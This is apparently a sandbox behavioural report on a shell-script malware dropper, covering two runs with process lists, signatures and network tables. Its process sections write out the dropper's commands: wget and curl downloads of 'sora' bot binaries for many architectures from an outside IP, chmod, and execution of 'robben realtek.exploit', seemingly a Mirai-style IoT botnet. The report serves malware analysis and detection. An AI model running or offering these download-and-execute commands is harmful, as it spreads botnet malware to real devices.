debian9-mipsbe-20240611-en
Max time kernel
83s
Max time network
86s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
debian9-mipsel-20240611-en
Max time kernel
32s
Max time network
60s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |